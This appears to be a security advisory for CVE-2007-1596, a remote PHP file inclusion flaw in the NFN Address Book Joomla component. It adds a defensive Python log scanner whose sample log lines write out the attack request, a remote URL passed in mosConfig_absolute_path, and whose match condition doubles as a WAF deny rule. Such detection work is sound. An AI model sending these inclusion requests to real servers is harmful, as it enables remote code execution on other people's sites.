PT-2007-2978 · Nfn · Nfn Address Book
Cold Zero · Published 2007-03-22 · Updated 2017-10-11 · CVE-2007-1596
CVSS v2.0: 9.3 (High)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions
NFN Address Book (com_nfn_addressbook) version 0.4
Description
The issue allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to specific API endpoints, such as "/components/com_nfn_addressbook/nfnaddressbook.php" or "/administrator/components/com_nfn_addressbook/nfnaddressbook.php".
Recommendations
For NFN Address Book (com_nfn_addressbook) version 0.4, consider restricting access to the mosConfig_absolute_path parameter in the affected API endpoints until a patch is available. As a temporary workaround, avoid using the mosConfig_absolute_path parameter in the "/components/com_nfn_addressbook/nfnaddressbook.php" and "/administrator/components/com_nfn_addressbook/nfnaddressbook.php" endpoints to minimize the risk of exploitation.
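One way to check web server access logs for requests that match this description, as an added example that is not part of the original advisory or of the NFN Address Book code. It assumes common/combined log format; the log lines, addresses and the function names `is_suspicious` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# The two endpoints and the parameter named in the advisory.
AFFECTED_PATHS = (
    "/components/com_nfn_addressbook/nfnaddressbook.php",
    "/administrator/components/com_nfn_addressbook/nfnaddressbook.php",
)
PARAM = "mosconfig_absolute_path"
# A value that starts with scheme:// is a URL, not a local filesystem path.
URL_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
# Request line inside a common/combined access-log entry.
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Mar/2007:10:00:01 +0000] "GET /components/com_nfn_addressbook/'
    'nfnaddressbook.php?mosConfig_absolute_path=http://example.org/x.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [22/Mar/2007:10:00:02 +0000] "GET /administrator/components/'
    'com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path='
    'http%3A%2F%2Fexample.org%2Fx.txt HTTP/1.1" 200 512',
    '192.0.2.12 - - [22/Mar/2007:10:00:03 +0000] "GET /index.php?option=com_nfn_addressbook HTTP/1.1" 200 2048',
    '192.0.2.13 - - [22/Mar/2007:10:00:04 +0000] "GET /components/com_nfn_addressbook/'
    'nfnaddressbook.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 512',
]

def is_suspicious(target):
    """True if the request hits an affected endpoint with a URL in the parameter."""
    raw_path, _, query = target.partition("?")
    # Decode and normalise the path so //, %2F and case variants still match.
    path = re.sub(r"/{2,}", "/", unquote(raw_path)).lower()
    if not path.endswith(AFFECTED_PATHS):
        return False
    # parse_qsl percent-decodes names and values, so encoded URLs are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() == PARAM and URL_VALUE.match(value):
            return True
    return False

def scan(lines):
    """Return (client, request target) for each log line that matches."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and is_suspicious(m.group("target")):
            hits.append((line.split(" ", 1)[0], m.group("target")))
    return hits

if __name__ == "__main__":
    for client, target in scan(SAMPLE_LOG):
        print(client, target)
```

The same match condition (affected path plus a scheme-prefixed value in the parameter) can be used as a deny rule at a reverse proxy or WAF while the component remains installed.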
Affected products
Nfn Address Book